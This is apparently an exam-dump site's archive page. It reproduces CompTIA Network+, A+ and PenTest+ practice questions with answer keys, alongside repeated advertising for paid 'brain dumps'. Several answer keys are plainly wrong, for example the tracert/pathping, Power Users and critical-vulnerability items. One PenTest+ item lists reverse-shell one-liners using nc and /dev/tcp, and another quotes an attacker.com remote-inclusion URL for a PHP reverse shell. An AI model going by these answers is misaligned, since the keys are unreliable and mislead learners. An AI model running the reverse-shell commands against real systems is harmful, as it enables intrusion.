Category Archive : CompTIA

[2020.7] Latest updates CompTIA Network+ n10-007 exam practice questions and Lead4pass n10-007 dumps

How do I get the latest updated CompTIA n10-007 exam exercise questions and exam dumps?

Examkraft free to share the latest CompTIA Network+ exam exercise questions and answers! n10-007 Exam Certifications “CompTIA Network+”
You can find the free n10-007 pdf, n10-007 practice questions online test, and our recommended https://www.lead4pass.com/n10-007.html
(brain dumps). Pass the exam with ease! Online learning helps you improve your skills and exam experience!

Examkraft n10-007 exam catalog

Examkraft CompTIA n10-007 video tutorial

Latest CompTIA n10-007 exam pdf free download

[PDF Q1-Q12] Free CompTIA n10-007 pdf dumps download from Google Drive: https://drive.google.com/file/d/1BKULWtX_5LQW4KC6llrXYHjWscSL4bP0/

Network+ (Plus) Certification | CompTIA IT Certifications: https://www.comptia.org/certifications/network

CompTIA Network+ N10-007 has been updated and reorganized to address the current networking technologies with expanded coverage of several domains by adding:

  • Critical security concepts to helping networking professionals work with security practitioners
  • Key cloud computing best practices and typical service models
  • Coverage of newer hardware and virtualization techniques
  • Concepts to give individuals the combination of skills to keep the network resilient

Latest Updates CompTIA n10-007 Exam Practice Questions and Answers

QUESTION 1

169.254.0.100 is an IP address that would MOST likely come from which of the following?
A. CIDR
B. DHCP
C. APIPA
D. DNS

Correct Answer: C

QUESTION 2

Which of the following technologies is required to allow all ports of a single private IP to be publically accessible via a
single public IP?
A. NAT
B. RIP
C. PAT
D. ACL

Correct Answer: C

QUESTION 3

A network engineer wants to segment the network into multiple broadcast domains. Which of the following devices
would allow for communication between the segments?
A. Layer 2 switch
B. Layer 3 switch
C. Bridge
D. Load balancer

Correct Answer: B

QUESTION 4

A bookstore uses a Faraday cage to comply with credit card regulations. Customers report that their cellular phones
have no signal when they are in the bookstore. Which of the following is the MOST likely cause?
A. The Faraday cage is creating interference within the bookstore.
B. The Faraday cage prevents access by redirecting signals.
C. The Faraday cage is creating latency on the cellular network.
D. The Faraday cage is creating attenuation of the cellular network.

Correct Answer: B

QUESTION 5

Jeff, a user, is having a problem with a POTS line. Which of the following tools would Jeff use to make sure the phone
lines have a dial tone?
A. Loopback plugs
B. Butt set
C. Cable certifier
D. Toner probe

Correct Answer: B

QUESTION 6

Which of the following WAP security features offers the STRONGEST encryption?
A. WPA
B. WPA2
C. WEP
D. Hidden SSID

Correct Answer: B

QUESTION 7

A Windows server has a problem after booting up. Kim, a technician, should immediately check the:
A. history logs.
B. cron logs.
C. application logs.
D. system logs.

Correct Answer: D

QUESTION 8

A user reports difficulties connecting a PC to a wired network. The PC connects to an IP phone, which is working
correctly. A network technician can verify that other devices successfully connect to the phone. At which of the following
layers of the OSI model is the problem MOST likely located?
A. Network
B. Physical
C. Transport
D. Application

Correct Answer: A

QUESTION 9

Matt, an administrator, notices a flood fragmented packet and retransmits from an email server. After disabling the TCP
offload setting on the NIC, Matt sees normal traffic with packets flowing in sequence again. Which of the following
utilities was he MOST likely using to view this issue?
A. Spam filter
B. Protocol analyzer
C. Web application firewall
D. Load balancer

Correct Answer: B

QUESTION 10

An employee wishes to use a personal cell phone for work-related purposes, including storage of sensitive company
data, during long business trips. Which of the following is needed to protect BOTH the employee and the company?
A. An NDA ensuring work data stored on the personal phone remains confidential
B. An AUP covering how a personal phone may be used for work matters
C. Consent to monitoring policy covering company audits of the personal phone
D. Real-time remote monitoring of the phone\’s activity and usage

Correct Answer: D

QUESTION 11

A DSL modem connects to the provider\’s network using which of the following authentication techniques?
A. PoE
B. MS-CHAP
C. PPPoE
D. EAP

Correct Answer: C

QUESTION 12

Which of the following devices, if implemented, would result in decreased administration time of an 802.11 network
running centralized authentication services? (Choose two.)
A. VPN concentrator
B. Proxy server
C. Wireless controller
D. RADIUS server
E. Multilayer switch

Correct Answer: CD

QUESTION 13

Kim, the client, has requested a cost-effective network solution to accommodate the ability to reconfigure the office
space as needed. Which networking solution would provide the BEST solution?
A. Private IP Addressing
B. Wireless Access Points
C. Wide Area Networking
D. Virtual Local Area Networks

Correct Answer: B

Share lead4Pass CompTIA n10-007 Coupon codes for free 2020

why lead4pass

Lead4Pass Reviews

Lead4Pass has about 10 years of exam experience! Helped many friends pass the CompTIA exam! Lead4pass Year-round Update Exam guarantees up-to-date and effective! Highest pass rate! The highest price/performance ratio! Guaranteed first attempt to pass the exam!

why lead4pass

CompTIA n10-007 Exam Tips Summary:

CompTIA n10-007 is already the ultimate help here, we share the latest exam pdf, the latest online exercise questions!
And the brand website recommends “Lead4Pass”.

Latest update Lead4pass n10-007 exam dumps: https://www.lead4pass.com/n10-007.html (829 Q&As)

[Q1-Q12 PDF] Free CompTIA n10-007 pdf dumps download from Google Drive: https://drive.google.com/file/d/1BKULWtX_5LQW4KC6llrXYHjWscSL4bP0/

[2020.7] Latest updates CompTIA A plus 220-1002 exam practice questions and Lead4pass 220-1002 dumps

How do I get the latest updated CompTIA 220-1002 exam exercise questions and exam dumps?

Examkraft free to share the latest CompTIA A-plus exam exercise questions and answers! 220-1002 Exam Certifications “CompTIA A+ Certification Exam: Core 2” You can find the free 220-1002 pdf, 220-1002 practice questions online test, and our recommended https://www.lead4pass.com/220-1002.html
(brain dumps). Pass the exam with ease! Online learning helps you improve your skills and exam experience!

Examkraft 220-1002 exam catalog

Examkraft CompTIA 220-1002 video tutorial

Latest CompTIA 220-1002 exam pdf free download

[PDF Q1-Q12] Free CompTIA 220-1002 pdf dumps download from Google Drive: https://drive.google.com/file/d/1vL1xnerIP4kDLxhbrBwWLs1ltr1wOKOr/

A+ (Plus) Certification | CompTIA IT Certifications: https://www.comptia.org/certifications/a

CompTIA A+ 220-1001 covers mobile devices, networking technology, hardware, virtualization, and cloud computing and network troubleshooting.

CompTIA A+ 220-1002 covers installing and configuring operating systems, expanded security, software troubleshooting and operational
procedures.

Latest Updates CompTIA 220-1002 Exam Practice Questions and Answers

QUESTION 1

A user has installed a legacy application in Windows 7 and reports that only some of the functionality in it is operational.
Another user is using the same application on a different Windows 7 machine and doesn\’t report those problems.
Which of the following features in Windows 7 may be responsible for this problem?
A. System Protection settings
B. User Account Control
C. Action Center
D. Data Execution Prevention

Correct Answer: B

Reference: http://windows.microsoft.com/en-us/windows7/products/features/user-account- control

QUESTION 2

A user Is unable to access a network share out can access email. A technician has confirmed the user has the
appropriate permissions to access the share. Which of the following commands should the technician use FIRST?
A. ping
B. nslooking
C. net use
D. ipconfig

Correct Answer: B

QUESTION 3

An administrator sets up a wireless device that they will need to manage across the Internet. Which of the following
security measures would BEST prevent unauthorized access to the device from the Internet?
A. Set the channels to wireless 802.11n only
B. Change the default username and password
C. Enable the wireless AP\’s MAC filtering
D. Enable the wireless AP\’s WPA2 security

Correct Answer: B

QUESTION 4

A user who is running Windows XP calls a technician to upgrade the computer to a newer Windows OS. The user states
the computer has only 1GB of RAM and 16GB of hard drive space with a 1,7GHz processor. Which of the following OSs
should the technician recommended to ensure the BEST performance on this computer?
A. Windows 7
B. Windows 8
C. Windows 8.1
D. Windows 10

Correct Answer: A

QUESTION 5

A Linux user report that an application will not open and gives the error only one instance of the application may run at
one time. A root administrator logs on ot the device and opens terminal. Which of the following pairs of tools will be
needed to ensure no other instance of the software are correctly running?
A. Pad and chmod
B. Node and vi
C. Is an chown
D. Ps and kill
E. Op and rm

Correct Answer: D

QUESTION 6

A technician is trying to remove a resilient computer virus. The virus keeps coming back after rebooting the system
because some program or service has locked some of the virus\’ files and is preventing the AV from cleaning the
system. Which of the following is the BEST approach to try and remove the virus while minimizing negative impact to
the system?
A. Use REGSRV32 to deregister the virus DLLs.
B. Run the antivirus after rebooting in safe mode.
C. Use the repair disk and follow the prompts.
D. Use the recovery console to disable all windows services.

Correct Answer: B

QUESTION 7

A technician has replaced several corporate human resources computers and is asked to ensure the information on the
drives cannot be retrieved. Which of the following destruction methods would BEST ensure this data is irretrievable?
A. Overwriting
B. Formatting
C. Shredding
D. Drive wiping

Correct Answer: D

QUESTION 8

Which of the following would a technician use to store memory chips from a laptop safely after an upgrade?
A. Mylar bags
B. Cardboard boxes
C. Antistatic containers
D. Paper envelopes

Correct Answer: C

QUESTION 9

A user\’s corporate email is missing the shared inbox folders that were present before the user went on vacation. The
technician verifies the user is connected to the domain and can still send and receive email. Which of the following is
MOST likely causing the missing folders issue?
A. The Internet security options have changed
B. The operating system updates have changed
C. The network directory permissions have changed
D. The user account permissions have changed

Correct Answer: C

QUESTION 10

A technician receives an end user\’s computer that displays erratic behavior upon startup. When the technician starts
the computer performance is reduced. A window appears on the screen stating a purchase must be made to disinfect
the computer. The technician quarantines the computer and disables System Restore. Which of the following should the
technician do NEXT?
A. Roll back the NIC driver
B. Update and install anti-malware software
C. Configure and enable the email spam filters
D. Verify the security certificate is valid
E. Perform a full system backup

Correct Answer: D

QUESTION 11

A technician logs on to a Linux computer and runs the following command:
ps -aux | grep vi
Which of the following MOST accurately describes the effect of the command?
A. It kills any running programs starting with the letters vi.
B. It opens a list of directories that start with the letters vi.
C. It creates a new file named grep in the current working directory.
D. If finds a list of processes running a text editor.

Correct Answer: D

QUESTION 12

A company recently had a security breach and is now required to increase the security on their workstations. A
technician has been tasked to harden all the workstations on the network. Which of the following should the technician
do?
A. Enable Windows automatic updates
B. Enable screensaver required passwords
C. Enable MAC filtering
D. Enable wireless encryption

Correct Answer: B

Reference: http://windows.microsoft.com/is-is/windows-vista/use-your-windows-password- for-your- screen-saverpassword

QUESTION 13

A technician is cleaning up a warehouse and has several old CRT monitors and UPS units. The technician removes the
batteries from the UPSs and wants to comply with proper disposal techniques. Which of the following should the
technician do NEXT to proceed with disposal of the batteries?
A. Place securely in trash receptacles.
B. Refer to the manufacturer\’s specific usage.
C. Review the material safety data sheet.
D. Conduct an Internet search of disposal techniques.

Correct Answer: C

Share lead4Pass CompTIA 220-1002 Coupon codes for free 2020

why lead4pass

Lead4Pass Reviews

Lead4Pass has about 10 years of exam experience! Helped many friends pass the CompTIA exam! Lead4pass Year-round Update Exam guarantees up-to-date and effective! Highest pass rate! The highest price/performance ratio! Guaranteed first attempt to pass the exam!

why lead4pass

CompTIA 220-1002 Exam Tips Summary:

CompTIA 220-1002 is already the ultimate help here, we share the latest exam pdf, the latest online exercise questions!
And the brand website recommends “Lead4Pass”.

Latest update Lead4pass 220-1002 exam dumps: https://www.lead4pass.com/220-1002.html (303 Q&As)

[Q1-Q12 PDF] Free CompTIA 220-1002 pdf dumps download from Google Drive: https://drive.google.com/file/d/1vL1xnerIP4kDLxhbrBwWLs1ltr1wOKOr/

CompTIA PT0-001 exam exercise questions,PT0-001 dumps easy to prepare for passing exams

CompTIA PenTest+ PT0-001 Study Guide” Exam PT0-001. Here you can get the latest free CompTIA PT0-001 exam exercise questions and answers for free and easily improve your skills!

PT0-001 exam: The CompTIA PenTest+ certification verifies that successful candidates have the knowledge and skills required to plan and scope an assessment, understand legal and compliance requirements, perform vulnerability scanning and penetration testing, analyze data, and effectively report and communicate results. Follow the link to find more information about https://www.lead4pass.com/pt0-001.html exam.

Watch the CompTIA PT0-001 video tutorial online

Table of Contents:

Latest CompTIA PT0-001 pdf

[PDF] Free CompTIA PT0-001 pdf dumps download from Google Drive: https://drive.google.com/open?id=174AtllRzbI_c3ioXliaweHmevjoTd2oT

PenTest+ (Plus) Certification | CompTIA IT Certifications:https://www.comptia.org/certifications/pentest

About the exam

CompTIA PenTest+ assesses the most up-to-date penetration testing, and vulnerability assessment and management skills necessary to determine the resiliency of the network against attacks.
Successful candidates will have the intermediate skills required to customize assessment frameworks to effectively collaborate on and report findings. Candidates will also have the best practices to communicate recommended strategies to improve the overall state of IT security.

Free CompTIA PT0-001 Exam Practice Questions

QUESTION 1
A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains
IP addresses and times that each can be scanned. Which of the following would contain this information?
A. Rules of engagement
B. Request for proposal
C. Master service agreement
D. Business impact analysis
Correct Answer: A

QUESTION 2
An attacker uses SET to make a copy of a company\\’s cloud-hosted web mail portal and sends an email m to obtain the
CEO s login credentials Which of the following types of attacks is this an example of?
A. Elicitation attack
B. Impersonation attack
C. Spear phishing attack
D. Drive-by download attack
Correct Answer: C

QUESTION 3
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to
manage power generation and cooling. Which of the following is a consideration unique to such an environment that
must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
Correct Answer: A

QUESTION 4
A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration
tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the
penetration tester mostly like use?
A. perl -e ` use SOCKET\\’; $i=\\’; $p=\\’443;
B. ssh [email protected] -p 443
C. nc -e /bin/sh 443
D. bash -i >and /dev/tcp// 443 0>and1
Correct Answer: A
References: https://hackernoon.com/reverse-shell-cf154dfee6bd

QUESTION 5
A security consultant found a SCADA device in one of the VLANs in scope. Which of the following actions would BEST
create a potentially destructive outcome against device?
A. Launch an SNMP password brute force attack against the device.
B. Lunch a Nessus vulnerability scan against the device.
C. Launch a DNS cache poisoning attack against the device.
D. Launch an SMB exploit against the device.
Correct Answer: A

QUESTION 6
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
A. Implement a blacklist.
B. Block URL redirections.
C. Double URL encode the parameters.
D. Stop external calls from the application.
Correct Answer: B

QUESTION 7
A company requested a penetration tester review the security of an in-house-developed Android application. The
penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the
APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO)
A. Convert to JAR
B. Decompile
C. Cross-compile the application
D. Convert JAR files to DEX
E. Re-sign the APK
F. Attach to ADB
Correct Answer: BD

QUESTION 8
In which of the following components is an exploited vulnerability MOST likely to affect multiple running application
containers at once?
A. Common libraries
B. Configuration files
C. Sandbox escape
D. ASLR bypass
Correct Answer: A

QUESTION 9
Joe, a penetration tester, is asked to assess a company\\’s physical security by gaining access to its corporate office.
Joe ism looking for a method that will enable him to enter the building during business hours or when there are no
employee on-site. Which of the following would be MOST effective in accomplishing this?
A. Badge cloning
B. Lock picking
C. Tailgating
D. Piggybacking
Correct Answer: A
http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows/

QUESTION 10
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not
authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A. dsrm -users “DN=compony.com; OU=hq CN=usera”
B. dsuser -name -account -limit 3
C. dsquery uaer -inactive 3
D. dsquery -o -rein -limit 21
Correct Answer: C

QUESTION 11
After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the
attacker\\’s actual fingerprint without exploitation. Which of the following is the MOST likely of what happened?
A. The biometric device is tuned more toward false positives
B. The biometric device is configured more toward true negatives
C. The biometric device is set to fail closed
D. The biometnc device duplicated a valid user\\’s fingerpnnt.
Correct Answer: A

QUESTION 12
During testing, a critical vulnerability is discovered on a client\\’s core server. Which of the following should be the NEXT
action?
A. Disable the network port of the affected service.
B. Complete all findings, and then submit them to the client.
C. Promptly alert the client with details of the finding.
D. Take the target offline so it cannot be exploited by an attacker.
Correct Answer: A

QUESTION 13
A penetration tester observes that several high numbered ports are listening on a public web server. However, the
system owner says the application only uses port 443. Which of the following would be BEST to recommend?
A. Transition the application to another port
B. Filter port 443 to specific IP addresses
C. Implement a web application firewall
D. Disable unneeded services.
Correct Answer: D

Related PT0-001 Popular Exam resources

title pdf youtube CompTIA lead4pass Lead4Pass Total Questions
CompTIA PenTest+ lead4pass PT0-001 dumps pdf lead4pass PT0-001 youtube PenTest+ (Plus) Certification | CompTIA IT Certifications https://www.lead4pass.com/pt0-001.html 145 Q&A

Get Lead4Pass Coupons(12% OFF)

lead4pass coupons

What are the advantages of Lead4pass?

Lead4pass employs the most authoritative exam specialists from Cisco, CompTIA, Microsoft, IBM, Oracle, etc.
We update exam data throughout the year. Highest pass rate! We have a large user base. We are an industry leader! Choose Lead4Pass to pass the exam with ease!

why lead4pass

Summarize:

It’s not easy to pass the CompTIA exam, but with accurate learning materials and proper practice, you can crack the exam with excellent results. Lead4pass provides you with the most relevant learning materials that you can use to help you prepare.

CompTIA N10-007 exam exercise questions,N10-007 dumps easy to prepare for passing exams

Network+ Certification | CompTIA IT Certifications” Exam N10-007. Here you can get the latest free CompTIA N10-007 exam exercise questions and answers for free and easily improve your skills!

N10-007 exam: CompTIA Network+ N10-007 has been updated and reorganized to address the current networking technologies with expanded coverage of several domains by adding:

  • Critical security concepts to helping networking professionals work with security practitioners
  • Key cloud computing best practices and typical service models
  • Coverage of newer hardware and virtualization techniques
  • Concepts to give individuals the combination of skills to keep the network resilient

Follow the link to find more information about https://www.lead4pass.com/n10-007.html exam.

Watch the CompTIA N10-007 video tutorial online

Table of Contents:

Latest CompTIA N10-007 pdf

[PDF] Free CompTIA N10-007 pdf dumps download from Google Drive: https://drive.google.com/open?id=1rJQW9Ebqvlq8mKmXytaU5Xq0kj2UqFI5

Network+ Certification | CompTIA IT Certifications:https://www.comptia.org/certifications/network

Free CompTIA N10-007 Exam Practice Questions

QUESTION 1
Which of the following would Kim, a technician, do to monitor remote traffic through an access point?
A. Enable an SNMP agent
B. Enable network mapping
C. Set monitoring SSID
D. Select WPA2
Correct Answer: A

QUESTION 2
Which of the following MUST be used when securing a VoIP network consisting of private IP addresses?
A. IPS
B. Application layer firewall
C. IDS
D. An unmanaged switch
Correct Answer: B

QUESTION 3
Tenants access multiple wireless networks in a building. Users report intermittent connectivity. Which of the following is
the MOST likely cause of the problem?
A. The channels are overlapping with other wireless networks and should be changed.
B. The SSIDs are incompatible and should be renamed.
C. The users have incompatible wireless network cards and should upgrade.
D. The default idle period for logoff is too short and should be changed to a longer limit.
Correct Answer: A

QUESTION 4
A network technician is troubleshooting intermittent issues with VoIP call quality. A throughput tester can help assess
the functionality of which of the following?
A. LLDP
B. VLAN tagging
C. QoS
D. SIP trunking
Correct Answer: C

QUESTION 5
A national cable company providing TV, telephone, and Internet service to home users over its IP network, has been
tracking a large increase of network bandwidth due to P2P file sharing. Which of the following should the company
deploy to ensure excellent TV and telephone service?
A. QoS
B. Load balancing
C. High availability
D. Fiber optics
Correct Answer: A

QUESTION 6
company wants the public to be able to connect to the wireless network with minimal security, but not be able to connect
to the private internal network. Which of the following firewall rules would BEST accomplish this?
A. Content filtering on the wireless access point
B. Allow traffic from the wireless access point
C. Block traffic from the wireless access point
D. Packet filtering on the wireless access point
Correct Answer: C

QUESTION 7
Which of the following solutions will detect and disable a rogue access point?
A. Port scan
B. Packet sniffer
C. IPS
D. IDS
Correct Answer: C

QUESTION 8
Which of the following cable types have a rated MAXIMUM bandwidth of 100Mbps?
A. CAT3
B. CAT5
C. CAT5e
D. CAT6
Correct Answer: B

QUESTION 9
A user reports a network failure on a computer. The technician determines that the computer and NIC are operating
properly. Which of the following tools can the technician use to trace the network cabling back to the punch down
block?
A. Protocol analyzer
B. Multimeter
C. Punch down tool
D. Toner probe
Correct Answer: D

QUESTION 10
A network technician is troubleshooting an issue and has established a theory of probable cause. Which of the following
steps should the network technician take NEXT?
A. Test the possible solution
B. Q1 the users
C. Determine what has changed
D. Document the theory
Correct Answer: A

QUESTION 11
A network technician is assisting the security team with some traffic captures. The security team wants to capture all
traffic on a single subnet between the router and the core switch. To do so, the team must ensure there is only a single
collision and broadcast domain between the router and the switch from which they will collect traffic. Which of the
following should the technician install to BEST meet the goal?
A. Bridge
B. Crossover cable
C. Hub
D. Media converter
Correct Answer: C

QUESTION 12
Which of the following problems is MOST likely to arise when configuring an IPv6 over IPv4 tunnel?
A. Routing loop
B. MTU black hole
C. Framing errors
D. SYN flood
Correct Answer: B

QUESTION 13
Joe, an employee at a large regional bank, wants to receive company email on his personal smartphone and table: To
authenticate on the mail server, he must first a custom security application on those mobile services. Which of the
following policies would BEST enforce this requirement?
A. Incident response policy
B. BYOD policy
C. DLP policy
D. Remote access policy
Correct Answer: B

Related N10-007 Popular Exam resources

title pdf youtube CompTIA lead4pass Lead4Pass Total Questions
CompTIA Network+ lead4pass N10-007 dumps pdf lead4pass N10-007 youtube Network+ Certification | CompTIA IT Certifications https://www.lead4pass.com/n10-007.html 624 Q&A
lead4pass N10-006 dumps pdf lead4pass N10-006 youtube https://www.comptia.org/certifications/network https://www.lead4pass.com/n10-006.html 30 Q&A

Get Lead4Pass Coupons(12% OFF)

lead4pass coupons

What are the advantages of Lead4pass?

Lead4pass employs the most authoritative exam specialists from Cisco, CompTIA, Microsoft, IBM, Oracle, etc.
We update exam data throughout the year. Highest pass rate! We have a large user base. We are an industry leader!
Choose Lead4Pass to pass the exam with ease!

why lead4pass

Summarize:

It’s not easy to pass the CompTIA exam, but with accurate learning materials and proper practice, you can crack the exam with excellent results. Lead4pass provides you with the most relevant learning materials that you can use to help you prepare.

[2020.3]Latest effective CompTIA 220-1002 brain dumps online practice test

Shares the latest CompTIA A+ 220-1002 exam dumps for free exam practice tests and online downloads! “CompTIA A+ Certification Exam: Core 2” 220-1002 exam. Ready to pass the 220-1002 exam please click https://www.lead4pass.com/220-1002.html (full exam dump)

Share a free CompTIA 220-1002 video tutorial

CompTIA 220-1002 Exam pdf

[PDF Q1-Q13] Free CompTIA 220-1002 pdf dumps download from Google Drive: https://drive.google.com/open?id=1qP9pBkTnu1Ye7zXdSksaFthw2E3LOWDP

CompTIA A+ Core 2 (220-1002) Certification Study Guide: https://www.comptia.org/training/books/a-core-2-220-1002-study-guide

Latest CompTIA 220-1002 Online Exam Practice Questions

QUESTION 1
Which of the following is the amount of memory a user is limited to with a 32-bit version of Windows?
A. 2GB
B. 4GB
C. 8GB
D. 16GB
Correct Answer: B

QUESTION 2
Joe, a customer, requests to have a technician rename his laptop to the name of his favorite sports team. Which of the
following documents MUST the technician consider before performing this action?
A. Acceptable use policy
B. Inventory management
C. EULA
D. MDM policy
Correct Answer: B

QUESTION 3
Which of the following steps would allow display output from a laptop to an external display? (Select TWO).
A. Press the appropriate Function Key combination
B. A second video card in the Express card slot
C. Disconnect the integrated display
D. Enabling second monitor in the Windows Display Settings
E. Loading external monitor drivers on the laptop
Correct Answer: AD
First enable second monitor in Windows Display settings. After that press the function key along with the assigned key
to display the output on an external monitor

QUESTION 4
A user notices recent print jobs are not printing to the local printer despite printing fine yesterday. There are no errors
indicated on the taskbar printer icon. Which of the following actions should the user take FIRST?
A. Check to ensure the printer selected is the default printer
B. Check the status of the print server queue
C. Cancel all documents and print them again
D. Check that the printer is not offline print mode
Correct Answer: B

QUESTION 5
A user brings in an older CRT monitor and reports there are issues with the colors and bands of discoloration.
Which of the following should be done to correct the issue?
A. Replace the power cord
B. Reformat
C. Increase the refresh rate
D. Degauss
Correct Answer: D

QUESTION 6
A SOHO has had several issues with various unauthorized devices consuming the network\\’s bandwidth. There are
only four network devices that are authorized to access the Internet as well as the local LAN\\’s resources. Which of the
following security implementations would MOST likely help disable network access to the unauthorized devices?
A. Using complex passwords
B. Disabling the use of static IP addresses
C. Disabling ports
D. MAC filtering
Correct Answer: D

QUESTION 7
Which of the following Windows Enterprise OS version Offers BitLocker as a feature that can be enabled?
A. Windows 7
B. Windows 8
C. Windows 8.1
D. Windows 10
Correct Answer: A

QUESTION 8
A network administrator needs to be able to securely connect to a local router from within the office. Which of the
following protocols should the administrator ensure is enabled on the router?
A. RDP
B. SSH
C. TFTP
D. HTTP
Correct Answer: B

QUESTION 9
Joe, a user, reports that several of his colleagues have received a suspicious email from his account that he did not
send. A technician asks one of the colleagues to forward the email for inspection. After ruling out spoofing, the
technician verifies the email originated from the corporate email server.
Which of the following is the FIRST step the technician should take to correct this issue?
A. See if Joe\\’s email address has been blacklisted
B. Change the password on Joe\\’s email account
C. Update the antivirus and perform a full scan on the PC
D. Isolate Joe\\’s computer from the network
Correct Answer: D

QUESTION 10
Joe. a technician, receives notification that a share for production data files on the network Is encrypted. Joe suspects a
crypto virus Is active. He checks the rights of the network share to see which departments have access. He then
searches the user directories of those departmental users who are looking for encrypted files. He narrows his search to
a single user\\’s computer. Once the suspected source of the virus is discovered and removed from the network, which
of the following should Joe do NEXT?
A. Educate the end user on safe browsing and email habits.
B. Scan and remove the malware from the infected system.
C. Create a system restore point and reboot the system.
D. Schedule antivirus scans and perform Windows updates.
Correct Answer: D

QUESTION 11
A technician accessed a network share from a computer joined to workgroup. The technician logged in as “user1” and
directed the computer to save the username and password. Several weeks later, the technician wants to log in to this
network share using the administrator account. The computer does not prompt for a username and password, but it
automatically logs in to the network share under the “user1” account.
Which of the following would allow the technician to log in using the “administrator” username?
A. Use the command: net use Z: \\fileserver\share
B. Go to the Sync Center and disable the offline files feature.
C. Delete the “user” account for the network share in Credential Manager.
D. Join the computer and file server to a domain and delegate administrator rights to “user1”.
E. Use the Advanced Sharing options in the Network and Sharing Center and enable “turn on network discovery”.
Correct Answer: A

QUESTION 12
Which of the following user groups had default administrative permissions in previous versions of Windows, but now has
no default user rights m Windows 7 and above?
A. Power Users
B. Performance Monitor Users
C. Administrators
D. Guests
E. Users
Correct Answer: C

QUESTION 13
A technician receives a phone call regarding ransomware that has been detected on a PC in a remote office. Which of
the following steps should the technician take FIRST?
A. Disconnect the PC from the network
B. Perform an antivirus scan
C. Run a backup and restore
D. Educate the end user
Correct Answer: A

Share lead4pass discount codes for free

lead4pass coupons

About lead4pass!

lead4pass offers the latest exam practice questions and answers free of charge! Update all exam questions throughout the year, with a number of professional exam experts! To make sure it works! Maximum pass rate, best value for money! It helps you pass the exam easily on your first attempt.

why lead4pass

Summarize:

Where can I get the latest updates for CompTIA A+ 220-1002 exam dumps? You need to be prepared for it! You need the latest and most effective learning materials and proper practices to pass the 220-1002 exam.
“CompTIA A+ Certification Exam: Core 2”. lead4pass offers you the latest CompTIA 220-1002 dumps exam materials! You can use the materials to prepare to help you achieve excellent results!

Latest update Lead4pass 220-1002 exam dumps: https://www.lead4pass.com/220-1002.html (303 Q&As)

[Q1-Q13 PDF]Free CompTIA 220-1002 pdf dumps download from Google Drive: https://drive.google.com/open?id=1qP9pBkTnu1Ye7zXdSksaFthw2E3LOWDP

[2020.3]Latest effective CompTIA 220-1001 brain dumps online practice test

Shares the latest CompTIA A+ 220-1001 exam dumps for free exam practice tests and online downloads! “CompTIA A+ Certification Exam: Core 1” 220-1001 exam. Ready to pass the 220-1001 exam please click https://www.lead4pass.com/220-1001.html (full exam dump)

Share a free CompTIA 220-1001 video tutorial

CompTIA 220-1001 Exam pdf

[PDF Q1-Q13] Free CompTIA 220-1001 pdf dumps download from Google Drive: https://drive.google.com/open?id=1Dc7_J3eo-En6pf55xo1b_jdqXPQgCOIB

A+ Core 1 (220-1001) Certification Study Guide: https://www.comptia.org/training/books/a-core-1-220-1001-study-guide

Latest CompTIA 220-1001 Online Exam Practice Questions

QUESTION 1
A technician is troubleshooting network connectivity issues after a new wireless router was installed in an office. Users
who connect to the new router are unable to access LAN resources. Which of the following is the MOST likely cause of
the issue?
A. There are conflicting DHCP servers on the network
B. There are conflicting ARP records
C. There are conflicting gateways on the network
D. There are conflicting IP protocols
Correct Answer: A

QUESTION 2
A user brings in a smartphone for repair. The device is unable to send/receive calls or connect to WiFi. All applications
on the device are working unless they require connectivity.
Which of the following is MOST likely causing the problem?
A. Airplane mode
B. Tethering
C. Disabled hotspot
D. VPN
Correct Answer: A

QUESTION 3
Which of the following channels would commonly be used on an 802.11 wireless network?
A. 6
B. 17
C. 802
D. 8080
Correct Answer: A

QUESTION 4
Which of the following is the main purpose of the +5VSB output of a power supply?
A. It allows peripherals to draw power when the machine is off
B. It provides power to the audio and sound boards of the machine
C. It acts as the main voltage supply to the motherboard and processor
D. It powers all expansion cards and external device hubs
Correct Answer: A

QUESTION 5
There are 20 laptops in a room and they all need to connect wirelessly to the network. Which of the following would be
the BEST device to use?
A. Switch
B. Router
C. Access point
D. Hub
Correct Answer: C

QUESTION 6
A shipping department is having problems with its thermal label printer. Two columns on the left are not appearing on all
labels. Which of the following should a technician do FIRST?
A. Verify the ribbon is correctly aligned to the label
B. Run a label calibration
C. Remove stuck labels from the print path
D. Replace the print head
Correct Answer: A

QUESTION 7
Which of the following has a P4 connector to provide a 12V output?
A. Molex connector
B. 24-pin adapter
C. SCSI cable
D. eSATA cable
Correct Answer: A

QUESTION 8
A user connects a laptop to a docking station but is unable to see an image on the external monitor. The user tests the
docking station USB ports, and they are working fine. Which of the following should be done NEXT?
A. Check for firmware updates
B. Configure extended display mode
C. Replace the external monitor
D. Adjust the laptop\\’s BIOS settings
Correct Answer: B

QUESTION 9
A technician is troubleshooting network connectivity issue with a remote host. Which of the following tools BEST inform
the technician of nodes between the client and the host? (Select TWO).
A. tracert
B. ping
C. tcpdump
D. pathping
E. netstate
F. nslookup
G. router
Correct Answer: EF

QUESTION 10
DRAG DROP (2)
A customer, Ann, has requested two custom PCs, one to be used for gaming and the other to be used as a virtualization
workstation for her business.
The gaming PC should support the latest games and gaming peripherals.
The virtualization workstation should be able to host several production virtual machines as part of Ann\\’s home
business.
INSTRUCTIONS
Use the tabs at the top to switch between the PCs.
Objects should be placed on the appropriate slot/display areas and can only be used once.
All slot/display areas should be filled.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Select and Place:lead4pass 220-1001 exam question q10

Correct Answer:

lead4pass 220-1001 exam question q10-1

QUESTION 11
A user is experiencing email problems and explains to a technician that all emails with graphics or images do not display
the graphics.
Which of the following configurations would correct this behavior?
A. Change the email settings in antivirus.
B. Change the security settings of the email client.
C. Change the firewall security settings.
D. Change the email proxy settings.
E. Change the trusted sites in the browser settings.
Correct Answer: B

QUESTION 12
A user has requested a device that could be used for web-conferences while away from work. The device will mainly be
